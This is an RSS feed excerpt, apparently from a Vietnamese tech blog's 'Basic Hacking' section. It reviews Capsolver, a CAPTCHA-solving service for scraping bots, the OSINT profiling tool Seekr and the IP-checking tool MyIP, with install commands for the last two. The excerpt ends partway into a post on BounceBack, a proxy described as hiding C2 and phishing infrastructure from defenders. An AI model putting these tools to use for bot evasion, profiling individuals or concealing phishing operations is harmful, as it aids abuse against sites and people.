										<content:encoded><![CDATA[<p>Trong thời đại kỹ thuật số, việc tự động hóa các tác vụ trực tuyến đã trở nên phổ biến hơn bao giờ hết. Tuy nhiên, sự hiện diện của CAPTCHA &#8211; một hệ thống kiểm tra nhằm phân biệt người dùng thật và bot &#8211; thường gây ra trở ngại đáng kể cho quá trình này. Đừng lo lắng, <strong>Capsolver</strong> đã đến để giải quyết vấn đề này!</p>
<h2><strong>Nỗi “phiền toái” mang tên CAPTCHA</strong></h2>
<p>Trong thế giới công nghệ số đang phát triển không ngừng, việc tự động hóa web và thu thập dữ liệu (web scraping) đã trở thành một phần không thể thiếu. Tuy nhiên, CAPTCHA &#8211; một hệ thống kiểm tra nhằm phân biệt người dùng thật và bot &#8211; lại là một rào cản đáng kể mà nhiều nhà phát triển phải đối mặt.</p>
<p>Cho dù bạn đang xây dựng bot, thu thập dữ liệu hay chỉ đơn giản là cố gắng tự động hóa các tác vụ lặp đi lặp lại trên mạng, CAPTCHA có thể là một trở ngại lớn. Chính vì vậy, Capsolver ra đời như một giải pháp hữu hiệu để vượt qua những khó khăn này.</p>
<figure id="attachment_66035" aria-describedby="caption-attachment-66035" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/capsolver-1.jpg" alt="Capsolver giúp vượt qua trở ngại CAPTCHA" width="800" height="634" title="Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp 79"><figcaption id="caption-attachment-66035" class="wp-caption-text">Capsolver giúp vượt qua trở ngại CAPTCHA</figcaption></figure>
<p><span style="color: #339966;"><em><strong>Xem thêm: <a href="https://anonyviet.com/dns-spy-cong-cu-phan-tich-dns-cua-domain-bat-ky/">DNS Spy: Công cụ phân tích DNS của Domain bất kỳ</a></strong></em></span></p>
<h2><strong>Capsolver: Giải pháp tự động giải CAPTCHA hiệu Quả</strong></h2>
<p><strong>Capsolver</strong> là một dịch vụ tiên tiến được thiết kế để giải quyết CAPTCHA một cách tự động, giúp bạn tiết kiệm thời gian và công sức. Nền tảng này hỗ trợ một loạt các loại CAPTCHA, bao gồm các loại phổ biến như reCAPTCHA, hCaptcha và thậm chí cả các câu đố dựa trên hình ảnh phức tạp.</p>
<p>Điều làm nên sự khác biệt của Capsolver chính là tốc độ và độ chính xác &#8211; hai yếu tố quan trọng khi bạn đang xử lý tự động hóa ở quy mô lớn.</p>
<figure id="attachment_66036" aria-describedby="caption-attachment-66036" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/capsolver-2.jpg" alt="Capsolver extension" width="800" height="380" title="Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp 80"><figcaption id="caption-attachment-66036" class="wp-caption-text">Capsolver extension</figcaption></figure>
<p>Capsolver cung cấp các API dễ sử dụng, cho phép bạn tích hợp khả năng giải quyết CAPTCHA trực tiếp vào các ứng dụng của mình. Cho dù bạn đang làm việc với Python, JavaScript hay bất kỳ ngôn ngữ lập trình nào khác, Capsolver đều cung cấp tài liệu hướng dẫn rõ ràng để giúp bạn bắt đầu nhanh chóng.</p>
<p>Ví dụ: Bạn có thể dễ dàng tích hợp Capsolver vào một bot thu thập dữ liệu sản phẩm trên website thương mại điện tử. Khi bot gặp phải CAPTCHA, nó sẽ tự động gửi yêu cầu đến Capsolver để giải quyết và tiếp tục quá trình thu thập dữ liệu mà không bị gián đoạn.</p>
<figure id="attachment_66037" aria-describedby="caption-attachment-66037" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/capsolver-3.jpg" alt="Capsolver cung cấp các API dễ dùng" width="800" height="440" title="Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp 81"><figcaption id="caption-attachment-66037" class="wp-caption-text">Capsolver cung cấp các API dễ dùng</figcaption></figure>
<p>Link trang chủ Capsolver: https://www.capsolver.com/</p>
<h2><strong>Lợi ích khi sử dụng Capsolver</strong></h2>
<h3><strong>Tiết kiệm thời gian &amp; công sức</strong></h3>
<p>Hãy tưởng tượng bạn phải giải quyết hàng trăm, thậm chí hàng nghìn CAPTCHA mỗi ngày. Điều này không chỉ tốn thời gian mà còn gây ra sự mệt mỏi và giảm hiệu suất công việc. Capsolver sẽ tự động hóa quá trình này, giải phóng bạn khỏi những nhiệm vụ lặp đi lặp lại, cho phép bạn tập trung vào những công việc quan trọng hơn.</p>
<figure id="attachment_66038" aria-describedby="caption-attachment-66038" style="width: 614px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/capsolver-4.jpg" alt="Bảng giá của Capsolver" width="614" height="650" title="Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp 82"><figcaption id="caption-attachment-66038" class="wp-caption-text">Bảng giá của Capsolver</figcaption></figure>
<h3><strong>Nâng cao hiệu quả tự động hóa</strong></h3>
<p>Với khả năng giải quyết CAPTCHA nhanh chóng và chính xác, Capsolver giúp tối ưu hóa quy trình tự động hóa của bạn. Bot của bạn sẽ hoạt động trơn tru hơn, thu thập dữ liệu nhanh hơn và hiệu quả hơn.</p>
<h3><strong>Chi phí phải chăng</strong></h3>
<p>Capsolver áp dụng mô hình thanh toán theo lượt sử dụng, bạn chỉ phải trả tiền cho những CAPTCHA đã được giải quyết. Điều này giúp bạn kiểm soát chi phí hiệu quả, đặc biệt là đối với các dự án nhỏ hoặc hoạt động quy mô lớn.</p>
<h3><strong>Hỗ trợ 24/7</strong></h3>
<p>Với đội ngũ hỗ trợ chuyên nghiệp 24/7, bạn có thể yên tâm rằng Capsolver luôn sẵn sàng hỗ trợ bạn bất cứ lúc nào, đảm bảo quá trình tự động hóa của bạn diễn ra suôn sẻ.</p>
<p><span style="color: #339966;"><em><strong>Xem thêm: <a href="https://anonyviet.com/mr-holmes-cong-cu-thu-thap-thong-tin-danh-cho-dan-osint/">Mr Holmes: Công cụ thu thập thông tin dành cho dân OSINT</a></strong></em></span></p>
<h2><strong>Lời Kết</strong></h2>
<p><strong>Capsolver</strong> là một giải pháp toàn diện và hiệu quả để vượt qua rào cản CAPTCHA, giúp bạn tự động hóa các tác vụ trực tuyến một cách dễ dàng và nhanh chóng. Với tốc độ, độ chính xác cao, API dễ sử dụng và chi phí hợp lý, Capsolver là sự lựa chọn tối ưu cho các nhà phát triển, doanh nghiệp và bất kỳ ai muốn tối ưu hóa quy trình tự động hóa của mình.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Capsolver hỗ trợ những loại CAPTCHA nào?</h3>
<p>Capsolver hỗ trợ nhiều loại CAPTCHA phổ biến, bao gồm reCAPTCHA, hCaptcha và cả những câu đố hình ảnh phức tạp.</p>
<h3>Tôi có thể tích hợp Capsolver vào ứng dụng của mình như thế nào?</h3>
<p>Capsolver cung cấp các API dễ sử dụng, có tài liệu hướng dẫn rõ ràng cho nhiều ngôn ngữ lập trình, giúp bạn tích hợp nhanh chóng và dễ dàng.</p>
<h3>Phương thức thanh toán của Capsolver là gì?</h3>
<p>Capsolver áp dụng mô hình thanh toán theo lượt sử dụng, bạn chỉ trả tiền cho số lượng CAPTCHA đã được giải quyết.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/capsolver-giai-phap-tu-dong-giai-captcha-danh-cho-doanh-nghiep/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Seekr: Thu thập &#038; quản lý dữ liệu OSINT</title>
		<link>https://anonyviet.com/seekr-thu-thap-quan-ly-du-lieu-osint/</link>
					<comments>https://anonyviet.com/seekr-thu-thap-quan-ly-du-lieu-osint/#respond</comments>
		
		<dc:creator><![CDATA[Thanh Kim]]></dc:creator>
		<pubDate>Thu, 21 Nov 2024 23:25:09 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[Seekr]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=65146</guid>

					<description><![CDATA[Việc thu thập và phân tích thông tin từ các nguồn mở (OSINT) ngày càng trở nên quan trọng. Cho dù bạn là nhà nghiên cứu, nhà báo, chuyên gia an ninh mạng hay chỉ đơn giản là người muốn tìm hiểu thêm về thế giới xung quanh, việc có một công cụ OSINT mạnh [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Việc thu thập và phân tích thông tin từ các nguồn mở (OSINT) ngày càng trở nên quan trọng. Cho dù bạn là nhà nghiên cứu, nhà báo, chuyên gia an ninh mạng hay chỉ đơn giản là người muốn tìm hiểu thêm về thế giới xung quanh, việc có một công cụ OSINT mạnh mẽ và hiệu quả là điều cần thiết. Hãy cùng tìm hiểu về <strong>Seekr</strong>, một bộ công cụ OSINT đa năng và dễ sử dụng, hứa hẹn sẽ cách mạng hóa cách bạn tiếp cận và khai thác thông tin từ nguồn mở.</p>
<h2><strong>Giới thiệu về Seekr</strong></h2>
<p>Seekr là một bộ công cụ đa năng được thiết kế để thu thập và quản lý dữ liệu OSINT (Open Source Intelligence) thông qua một giao diện web trực quan và dễ sử dụng. Giao diện desktop của Seekr cho phép bạn tích hợp tất cả các công cụ OSINT yêu thích của mình vào một nơi duy nhất.</p>
<figure id="attachment_65148" aria-describedby="caption-attachment-65148" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/seekr-1.jpg" alt="Giới thiệu về Seekr" width="800" height="400" title="Seekr: Thu thập &amp; quản lý dữ liệu OSINT 85"><figcaption id="caption-attachment-65148" class="wp-caption-text">Giới thiệu về Seekr</figcaption></figure>
<p>Được viết bằng ngôn ngữ Go với BadgerDB là cơ sở dữ liệu, Seekr cung cấp một loạt các tính năng mạnh mẽ cho việc thu thập, tổ chức và phân tích dữ liệu. Cho dù bạn là nhà nghiên cứu, điều tra viên hay chỉ đơn giản là người muốn thu thập thông tin, Seekr sẽ giúp bạn dễ dàng tìm kiếm và quản lý dữ liệu cần thiết.</p>
<p><span style="color: #339966;"><em><strong>Xem thêm: Hướng dẫn <a href="https://anonyviet.com/huong-dan-lay-ip-nguoi-khac-bang-email-qr-code-file-word-excel-pdf/">lấy IP người khác bằng Email, QR Code, File Word, Excel, PDF,…</a></strong></em></span></p>
<h2><strong>Các tính năng chính của Seekr</strong></h2>
<ul>
<li>KHÔNG yêu cầu API key cho tất cả các tính năng, giúp tiết kiệm thời gian và công sức cho việc đăng ký và quản lý API key.</li>
<li>Giao diện Desktop quen thuộc và dễ sử dụng.</li>
<li>Cơ sở dữ liệu cho các mục tiêu OSINT được lưu trữ và tổ chức một cách hiệu quả.</li>
<li>Tích hợp / điều chỉnh nhiều công cụ OSINT phổ biến (ví dụ: phoneinfoga)</li>
<li>Tìm kiếm thông tin liên quan đến địa chỉ email trên GitHub.</li>
<li>Nhập thông tin bạn có và nhận được đề xuất về các công cụ web hữu ích.</li>
<li>Thẻ tài khoản cho mỗi người trong cơ sở dữ liệu để quản lý thông tin về các cá nhân một cách chi tiết.</li>
<li>Tự động tìm kiếm và liên kết các tài khoản trực tuyến.</li>
<li>Các trường (fields) được xác định trước thường được sử dụng trong cơ sở dữ liệu, giúp tiết kiệm thời gian nhập liệu và đảm bảo tính nhất quán.</li>
<li>Tùy chỉnh theme và plugin để mở rộng chức năng của Seekr.</li>
</ul>
<figure id="attachment_65149" aria-describedby="caption-attachment-65149" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/seekr-2.jpg" alt="Các tính năng chính của Seekr" width="800" height="554" title="Seekr: Thu thập &amp; quản lý dữ liệu OSINT 86"><figcaption id="caption-attachment-65149" class="wp-caption-text">Các tính năng chính của Seekr</figcaption></figure>
<h2><strong>Hướng dẫn cài đặt Seekr</strong></h2>
<p><strong>Lưu ý:</strong> Các bản build không ổn định có thể chứa lỗi và không được khuyến nghị sử dụng trong môi trường sản xuất.</p>
<h3><strong>Cài đặt Seekr trên Windows</strong></h3>
<ul>
<li><strong>Bản ổn định:</strong></li>
</ul>
<p>Tải xuống và chạy file exe mới nhất <strong><a href="https://github.com/seekr-osint/seekr/releases/latest" target="_blank" rel="noopener"><span style="text-decoration: underline;">tại đây</span></a></strong>. Sau đó, mở <span style="text-decoration: underline;"><a href="http://localhost:8569/web/" target="_blank" rel="noopener"><strong>giao diện web</strong></a></span> trong trình duyệt.</p>
<ul>
<li><strong>Bản không ổn định:</strong></li>
</ul>
<p>Đầu tiên bạn hãy cài đặt TypeScript và Go. Sau đó để cài Seekr trên Windows, hãy chạy các lệnh sau:</p>
<p><code>git clone https://github.com/seekr-osint/seekr</code><br />
<code>cd seekr</code><br />
<code>go generate ./...</code><br />
<code>tsc --project web</code><br />
<code>go run main.go</code></p>
<h3><strong>Cài đặt Seekr với Docker</strong></h3>
<p><code>docker pull ghcr.io/seekr-osint/seekr:latest</code><br />
<code>docker run -p 8569:8569 ghcr.io/seekr-osint/seekr:latest</code></p>
<h3><strong>Cài đặt Seekr trên Linux</strong></h3>
<ul>
<li><strong>Bản ổn định:</strong></li>
</ul>
<p>Tải xuống file binary ổn định mới nhất <strong><a href="https://github.com/seekr-osint/seekr/releases/latest" target="_blank" rel="noopener"><span style="text-decoration: underline;">tại đây</span></a></strong></p>
<ul>
<li><strong>Bản không ổn định:</strong></li>
</ul>
<p>Đảm bảo bạn đã cài đặt TypeScript và Go. Để cài đặt Seekr trên Linux, hãy chạy các lệnh sau:</p>
<p><code>git clone https://github.com/seekr-osint/seekr</code><br />
<code>cd seekr</code><br />
<code>go generate ./...</code><br />
<code>tsc --project web</code><br />
<code>go run main.go</code></p>
<p>Sau đó, mở <strong><a href="http://localhost:8569/web/" target="_blank" rel="noopener">giao diện web</a></strong> trong trình duyệt.</p>
<h3><strong>Chạy Seekr trên NixOS</strong></h3>
<p>Seekr được build với NixOS và hỗ trợ nix flakes. Để chạy Seekr trên NixOS, hãy chạy các lệnh sau:</p>
<p><code>nix shell github:seekr-osint/seekr</code><br />
<code>seekr</code></p>
<h2><strong>Cách sử dụng Seekr</strong></h2>
<p>Bạn có thể tham khảo hướng dẫn sử dụng công cụ này qua bài viết <strong><a href="https://anonyviet.com/seekr-bo-cong-cu-thu-thap-du-lieu-bang-osint/"><span style="text-decoration: underline;">NÀY</span></a></strong></p>
<p><span style="color: #339966;"><em><strong>Xem thêm: <a href="https://anonyviet.com/dns-spy-cong-cu-phan-tich-dns-cua-domain-bat-ky/">DNS Spy</a>: Công cụ phân tích DNS của Domain bất kỳ</strong></em></span></p>
<h2><strong>Lời Kết</strong></h2>
<p><strong>Seekr</strong> là một công cụ OSINT linh hoạt, cung cấp cho người dùng một giải pháp toàn diện để thu thập, tổ chức và phân tích dữ liệu từ các nguồn mở. Với giao diện thân thiện, tích hợp nhiều công cụ phổ biến và khả năng tùy chỉnh cao, Seekr là lựa chọn lý tưởng cho các nhà nghiên cứu, điều tra viên và bất kỳ ai muốn khai thác sức mạnh của OSINT.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Seekr có yêu cầu API key nào không?</h3>
<p>Không, Seekr không yêu cầu API key cho hầu hết các tính năng của nó, giúp tiết kiệm thời gian và công sức cho người dùng.</p>
<h3>Tôi có thể cài đặt Seekr trên hệ điều hành nào?</h3>
<p>Seekr hỗ trợ cài đặt trên Windows, Linux và NixOS.  Bạn có thể sử dụng cả bản cài đặt ổn định và bản không ổn định (có thể chứa lỗi).</p>
<h3>Seekr có dễ sử dụng không?</h3>
<p>Seekr được thiết kế với giao diện người dùng trực quan và dễ sử dụng, giúp người dùng dễ dàng thu thập, tổ chức và phân tích dữ liệu OSINT.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/seekr-thu-thap-quan-ly-du-lieu-osint/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>MyIP: Công cụ kiểm tra thông tin IP toàn diện</title>
		<link>https://anonyviet.com/myip-cong-cu-kiem-tra-thong-tin-ip-toan-dien/</link>
					<comments>https://anonyviet.com/myip-cong-cu-kiem-tra-thong-tin-ip-toan-dien/#respond</comments>
		
		<dc:creator><![CDATA[Thanh Kim]]></dc:creator>
		<pubDate>Tue, 19 Nov 2024 21:25:06 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[MyIP]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=65261</guid>

					<description><![CDATA[MyIP, một công cụ kiểm tra mạng toàn diện, nổi lên như một giải pháp hữu hiệu giúp người dùng thấu hiểu và quản lý kết nối internet của mình một cách hiệu quả. Trong bối cảnh thế giới số ngày càng phát triển, việc đảm bảo an toàn và tối ưu hóa hiệu suất [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>MyIP</strong>, một công cụ kiểm tra mạng toàn diện, nổi lên như một giải pháp hữu hiệu giúp người dùng thấu hiểu và quản lý kết nối internet của mình một cách hiệu quả. Trong bối cảnh thế giới số ngày càng phát triển, việc đảm bảo an toàn và tối ưu hóa hiệu suất mạng trở nên vô cùng quan trọng. MyIP không chỉ đơn thuần hiển thị địa chỉ IP, mà còn cung cấp một loạt các tính năng kiểm tra chuyên sâu, từ tốc độ mạng, rò rỉ DNS, WebRTC đến kiểm tra kiểm duyệt và tra cứu Whois.</p>
<h2><strong>Những tính năng chính của MyIP</strong></h2>
<ul>
<li><strong>Hiển Thị Địa Chỉ IP</strong>: Ứng dụng sẽ Xác định và hiển thị các địa chỉ IP cục bộ từ nhiều nhà cung cấp IPv4 và IPv6 khác nhau.</li>
<li><strong>Thông Tin IP</strong>: Cung cấp chi tiết về mọi địa chỉ IP, bao gồm quốc gia, khu vực, ASN, vị trí địa lý, và nhiều thông tin khác.</li>
<li><strong>Kiểm Tra Tình Khả Dụng:</strong> Xác định tính khả dụng của các trang web như Google, GitHub, YouTube, ChatGPT, và nhiều trang khác.</li>
<li><strong>Phát Hiện WebRTC:</strong> Xác định địa chỉ IP sử dụng trong các kết nối WebRTC.</li>
<li><strong>Kiểm Tra Rò Rỉ DNS:</strong> Hiển thị dữ liệu từ điểm cuối DNS để đánh giá nguy cơ rò rỉ DNS khi sử dụng VPN hoặc proxy.</li>
<li><strong>Kiểm Tra Tốc Độ Mạng:</strong> Đánh giá tốc độ kết nối mạng của bạn với các mạng biên.</li>
<li><strong>Kiểm Tra Quy Tắc Proxy:</strong> Kiểm tra các cài đặt quy tắc của phần mềm proxy để đảm bảo chúng hoạt động chính xác.</li>
<li><strong>Kiểm Tra Độ Trễ Toàn Cầu:</strong> Thực hiện các bài kiểm tra độ trễ trên các máy chủ tại các khu vực khác nhau trên thế giới.</li>
<li><strong>MTR Test:</strong> Thực hiện các bài kiểm tra MTR trên các máy chủ tại các khu vực khác nhau trên toàn cầu.</li>
<li><strong>DNS Resolver:</strong> Thực hiện phân giải DNS của một tên miền từ nhiều nguồn khác nhau và thu thập kết quả phân giải thời gian thực để xác định sự nhiễm độc DNS.</li>
<li><strong>Kiểm Tra Kiểm Duyệt:</strong> Kiểm tra xem liệu một trang web có bị chặn ở một số quốc gia hay không.</li>
<li><strong>Tra Cứu Whois:</strong> Thực hiện tra cứu thông tin whois cho tên miền hoặc địa chỉ IP.</li>
<li><strong>Tra Cứu Địa Chỉ MAC:</strong> Truy vấn thông tin của một địa chỉ vật lý.</li>
<li><strong>Chế Độ Tối:</strong> Tự động chuyển đổi giữa chế độ tối và sáng dựa trên cài đặt hệ thống, hoặc bạn có thể chuyển đổi thủ công.</li>
<li><strong>Chế Độ Tối Giản:</strong> Chế độ tối ưu hóa cho di động, rút ngắn độ dài trang để truy cập nhanh các thông tin cần thiết.</li>
<li><strong>Tra Cứu Thông Tin IP:</strong> Cung cấp công cụ tra cứu thông tin về bất kỳ địa chỉ IP nào.</li>
<li><strong>Hỗ Trợ PWA:</strong> Có thể thêm vào như một ứng dụng trên điện thoại hoặc dưới dạng ứng dụng Chrome trên máy tính.</li>
<li><strong>Phím Tắt:</strong> Hỗ trợ phím tắt cho tất cả các chức năng, nhấn ? để xem danh sách phím tắt.<br />
Dựa trên kết quả kiểm tra khả dụng, chỉ ra liệu kết nối internet toàn cầu có khả thi hay không.</li>
<li>Hỗ Trợ tiếng Anh, tiếng Trung và tiếng Pháp.</li>
</ul>
<figure id="attachment_65263" aria-describedby="caption-attachment-65263" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/myip-1.jpg" alt="Những tính năng chính của MyIP" width="800" height="274" title="MyIP: Công cụ kiểm tra thông tin IP toàn diện 88"><figcaption id="caption-attachment-65263" class="wp-caption-text">Những tính năng chính của MyIP</figcaption></figure>
<p><span style="color: #339966;"><em><strong>Xem thêm: <a href="https://anonyviet.com/de-digger-cong-cu-tim-file-cua-nguoi-khac-tren-google-drive/">De digger: Công cụ tìm File của người khác trên Google Drive</a></strong></em></span></p>
<h2><strong>Cách sử dụng MyIP</strong></h2>
<h3><strong>Triển khai MyIP trong môi trường Node</strong></h3>
<p><strong>Bước 1:</strong> Đầu tiên, đảm bảo bạn đã cài đặt Node.js trước khi thực hiện nhé</p>
<p><strong>Bước 2:</strong> Sao chép mã sau:</p>
<p><code>git clone https://github.com/jason5ng32/MyIP.git</code></p>
<p><strong>Bước 3:</strong> Chạy lệnh sau để cài đặt và build:</p>
<p><code>npm install &amp;&amp; npm run build</code></p>
<p><strong>Bước 4:</strong> Tiến hành chạy chương trình bằng lệnh này:</p>
<p><code>npm start</code></p>
<p>Chương trình sẽ chạy trên cổng 18966.</p>
<h3><strong>Sử dụng Docker</strong></h3>
<p>Nhấp vào Nút &#8216;Deploy to Docker&#8217; ở đầu trang để hoàn tất việc triển khai.</p>
<p>Hoặc sử dụng lệnh Shell sau:</p>
<p><code>docker run -d -p 18966:18966 --name myip --restart always jason5ng32/myip:latest</code></p>
<h2><strong>Biến Môi Trường (Environment Variable)</strong></h2>
<p>Bạn có thể sử dụng chương trình mà không cần thêm bất kỳ biến môi trường nào, nhưng nếu bạn muốn sử dụng một số tính năng nâng cao, bạn có thể thêm các biến môi trường vào.<br />
Danh sách các biến môi trường bạn có thể tham khảo tại <strong><a href="https://github.com/jason5ng32/MyIP" target="_blank" rel="noopener"><span style="text-decoration: underline;">trang Github của MyIP</span></a></strong></p>
<h3><strong>Sử dụng biến môi trường trong Node.js</strong></h3>
<p>Để tùy chỉnh MyIP trong Node.js, bạn có thể sử dụng biến môi trường. Dưới đây là các bước chi tiết:</p>
<p><strong>Bước 1:</strong> Để tạo các biến môi trường, bạn có thể làm theo các bước sau:</p>
<p><code>cp .env.example .env</code></p>
<p><strong>Bước 2:</strong> Sau đó, chỉnh sửa nội dung file .env và thêm các dòng như sau:</p>
<p><code>BACKEND_PORT=11966</code><br />
<code>FRONTEND_PORT=18966</code><br />
<code>BING_MAP_API_KEY="YOUR_KEY_HERE"</code><br />
<code>ALLOWED_DOMAINS="example.com"</code><br />
<code>IPCHECKING_API="YOUR_KEY_HERE"</code></p>
<p><strong>Bước 3:</strong> Cuối cùng, khởi động lại dịch vụ backend để áp dụng thay đổi.</p>
<p><strong>Giải thích các biến môi trường:</strong></p>
<ul>
<li>BACKEND_PORT: Cổng mà máy chủ backend sẽ lắng nghe.</li>
<li>FRONTEND_PORT: Cổng mà giao diện người dùng frontend sẽ chạy.</li>
<li>BING_MAP_API_KEY: Khóa API của Bing Maps, sử dụng cho các tính năng liên quan đến vị trí địa lý.</li>
<li>ALLOWED_DOMAINS: Danh sách các tên miền được phép truy cập ứng dụng.</li>
<li>IPCHECKING_API: Khóa API của dịch vụ kiểm tra IP, sử dụng để xác minh địa chỉ IP.</li>
</ul>
<h3><strong>Sử dụng biến môi trường trong Docker</strong></h3>
<p>Bạn cũng có thể sử dụng biến môi trường khi chạy MyIP trong Docker. Ví dụ:</p>
<p><code>docker run -d -p 18966:18966 \</code><br />
<code>-e BING_MAP_API_KEY="YOUR_KEY_HERE" \</code><br />
<code>-e ALLOWED_DOMAINS="example.com" \</code><br />
<code>-e IPCHECKING_API="YOUR_TOKEN_HERE" \</code><br />
<code>--name myip \</code><br />
<code>jason5ng32/myip:latest</code></p>
<h2><strong>Cách sử dụng MyIP nâng cao</strong></h2>
<p>Nếu bạn đang sử dụng proxy để truy cập internet, hãy cân nhắc thêm quy tắc sau vào cấu hình proxy của mình (chỉnh sửa tùy theo ứng dụng bạn sử dụng). Thiết lập này cho phép bạn kiểm tra cả IP thực và IP khi sử dụng proxy:</p>
<p><code># IP Testing</code><br />
<code>IP-CIDR,1.0.0.1/32,DIRECT,no-resolve</code><br />
<code>IP-CIDR6,2606:4700:4700::1111/128,DIRECT,no-resolve</code><br />
<code>DOMAIN-SUFFIX,ipify.org,Proxy</code><br />
<code># Rule Testing</code><br />
<code>DOMAIN,ptest-1.ipcheck.ing,Proxy1</code><br />
<code>DOMAIN,ptest-2.ipcheck.ing,Proxy2</code><br />
<code>DOMAIN,ptest-3.ipcheck.ing,Proxy3</code><br />
<code>DOMAIN,ptest-4.ipcheck.ing,Proxy4</code><br />
<code>DOMAIN,ptest-5.ipcheck.ing,Proxy5</code><br />
<code>DOMAIN,ptest-6.ipcheck.ing,Proxy6</code><br />
<code>DOMAIN,ptest-7.ipcheck.ing,Proxy7</code><br />
<code>DOMAIN,ptest-8.ipcheck.ing,Proxy8</code></p>
<p><strong>Giải thích quy tắc Proxy:</strong></p>
<ul>
<li>IP-CIDR và IP-CIDR6: Định tuyến các yêu cầu đến các địa chỉ IP cụ thể trực tiếp, không thông qua proxy.</li>
<li>DOMAIN-SUFFIX: Định tuyến các yêu cầu đến tên miền ipify.org thông qua proxy.</li>
<li>DOMAIN: Định tuyến các yêu cầu đến các tên miền ptest-*.ipcheck.ing thông qua các proxy khác nhau (Proxy1 đến Proxy8).</li>
</ul>
<p><strong>Lưu ý:</strong> Cấu hình này chỉ là ví dụ, bạn cần điều chỉnh theo cấu hình proxy cụ thể của mình.</p>
<p><span style="color: #339966;"><em><strong>Xem thêm: <a href="https://anonyviet.com/10-cong-cu-osint-ma-hacker-can-biet/">10 công cụ OSINT mà hacker cần biết</a></strong></em></span></p>
<h2><strong>Lời Kết</strong></h2>
<p>Tóm lại, <strong>MyIP</strong> là một công cụ mạnh mẽ và linh hoạt, cung cấp một giải pháp toàn diện để kiểm tra mạng và bảo vệ quyền riêng tư trực tuyến. Với giao diện thân thiện và dễ sử dụng, MyIP là lựa chọn hoàn hảo dành cho người dùng cá nhân và ngay cả chuyên gia.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>MyIP cung cấp những thông tin gì về địa chỉ IP của tôi?</h3>
<p>MyIP không chỉ hiển thị địa chỉ IP của bạn mà còn cung cấp thông tin chi tiết như quốc gia, khu vực, ASN, vị trí địa lý và nhiều thông tin khác nữa.</p>
<h3>Tôi có cần cài đặt phần mềm nào để sử dụng MyIP?</h3>
<p>Không, MyIP là một công cụ trực tuyến, bạn chỉ cần truy cập vào trang web của MyIP để sử dụng các tính năng của nó.</p>
<h3>MyIP có hỗ trợ ngôn ngữ nào?</h3>
<p>Hiện tại, MyIP hỗ trợ tiếng Anh, tiếng Trung và tiếng Pháp.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/myip-cong-cu-kiem-tra-thong-tin-ip-toan-dien/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>BounceBack: Lá chắn bảo vệ hạ tầng C2/Phishing khỏi các cuộc tấn công</title>
		<link>https://anonyviet.com/bounceback-la-chan-bao-ve-ha-tang-c2-phishing-khoi-cac-cuoc-tan-cong/</link>
					<comments>https://anonyviet.com/bounceback-la-chan-bao-ve-ha-tang-c2-phishing-khoi-cac-cuoc-tan-cong/#respond</comments>
		
		<dc:creator><![CDATA[Thanh Kim]]></dc:creator>
		<pubDate>Sun, 17 Nov 2024 22:25:03 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[BounceBack]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=65339</guid>

					<description><![CDATA[Việc bảo vệ hạ tầng khỏi các cuộc tấn công mạng ngày càng trở nên quan trọng. Đặc biệt đối với các hệ thống C2/Phishing, việc ẩn danh và bảo mật là yếu tố then chốt để duy trì hoạt động. BounceBack &#8211; một reverse proxy mạnh mẽ và linh hoạt &#8211; được thiết kế [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Việc bảo vệ hạ tầng khỏi các cuộc tấn công mạng ngày càng trở nên quan trọng. Đặc biệt đối với các hệ thống C2/Phishing, việc ẩn danh và bảo mật là yếu tố then chốt để duy trì hoạt động. BounceBack &#8211; một reverse proxy mạnh mẽ và linh hoạt &#8211; được thiết kế để đáp ứng nhu cầu này. Với khả năng tùy chỉnh cao, hệ thống lọc thông minh và tích hợp WAF, <strong>BounceBack</strong> là giải pháp tối ưu để bảo vệ hạ tầng của bạn khỏi sự dòm ngó và tấn công.</p>
<h2><strong>Giới thiệu về BounceBack</strong></h2>
<p><strong>BounceBack</strong> là một reverse proxy mạnh mẽ, có khả năng tùy chỉnh cao và cấu hình linh hoạt, tích hợp chức năng WAF (Web Application Firewall) giúp che giấu hạ tầng C2/phishing của bạn khỏi sự dòm ngó của đội ngũ bảo mật (blue team), sandbox, các công cụ quét,&#8230; Nó sử dụng phân tích lưu lượng truy cập thời gian thực thông qua nhiều bộ lọc để ngăn chặn những truy cập bất hợp pháp.</p>
<p>Công cụ này được phân phối kèm theo danh sách các từ bị chặn, địa chỉ IP bị chặn và cho phép cấu hình sẵn. Để biết thêm thông tin về cách sử dụng công cụ, bạn có thể truy cập wiki của dự án dưới đây:</p>
